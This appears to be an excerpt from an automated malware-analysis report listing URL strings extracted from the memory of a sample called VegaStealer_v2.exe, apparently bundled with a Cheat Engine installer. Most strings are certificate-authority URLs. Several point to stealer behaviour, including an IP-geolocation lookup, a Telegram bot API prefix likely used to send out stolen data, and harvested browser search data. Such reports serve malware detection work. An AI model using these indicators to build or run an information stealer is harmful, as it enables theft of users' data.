                                  Source: VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.d
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2039557081.0000000000E0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2013422206.0000000002C73000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2026508617.0000000002C74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.cPom/D
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3039818619.0000000004E2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                  Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                  Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micr
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micro
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microso
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsof
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2033044168.0000000003325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.
                                  Source: v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000032EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=61439
                                  Source: v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=61439d
                                  Source: v2.exe, 00000007.00000002.2163857464.00000000032EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fieldsTDl
                                  Source: v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000032EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.comd
                                  Source: v2.exe, 00000007.00000002.2188423957.0000000005E32000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                                  Source: v2.exe, 00000007.00000002.2192717711.0000000007A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.0/
                                  Source: powershell.exe, 0000000D.00000002.2259468035.000002505C180000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAFF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DC737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAEBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2038592762.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.c
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041749558.0000000000E0F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://ocsp.digicert.com0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040438850.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3039818619.0000000004E2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                                  Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                  Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: powershell.exe, 0000000D.00000002.2188691626.000002504C338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2188691626.000002504C111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFD41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 0000000D.00000002.2188691626.000002504C338000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                  Source: CheatEngine75.tmp, 00000008.00000002.3274678810.000000000018E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                  Source: powershell.exe, 0000001F.00000002.2304202480.000002D7DC44C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                  Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2041328386.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2027898638.000000000307E000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2042180976.0000000003071000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2039317387.000000000307F000.00000004.00000020.00020000.00000000.sdmp, VegaStealer_v2.exe, 00000005.00000003.2014460494.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, System.Data.SQLite.dll.5.dr, System.Data.SQLite.Linq.dll.5.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                                  Source: CheatEngine75.exe, 00000006.00000002.3278514154.0000000002196000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3310876008.00000000075AF000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dk-soft.org/
                                  Source: CheatEngine75.tmp, 00000008.00000003.2977340289.0000000004E1E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2979725135.0000000005A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mcafee.com
                                  Source: powershell.exe, 0000002B.00000002.2600381025.00000265D851C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                                  Source: powershell.exe, 0000002B.00000002.2600381025.00000265D851C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cx
                                  Source: powershell.exe, 0000002B.00000002.2600381025.00000265D851C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cxx
                                  Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                  Source: powershell.exe, 0000000D.00000002.2188691626.000002504C111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DAE41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265BFD41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                  Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265C1BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                                  Source: powershell.exe, 0000000D.00000002.2188691626.000002504DFCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2188691626.000002504DFA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265C1BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2367950222.00000265C1BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                                  Source: v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125
                                  Source: v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                                  Source: v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.vimeworld.ru/user/name/
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.razerzone.com/downloads/software/RazerEndUser
                                  Source: CheatEngine75.tmp, 00000008.00000003.2334804112.0000000004D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.razerzone.com/downloads/software/RazerEndUserLicenseAgreement.pdf
                                  Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.razerzone.com/downloads/software/RazerEndUserLicenseAgreement.pdfG
                                  Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                  Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                  Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
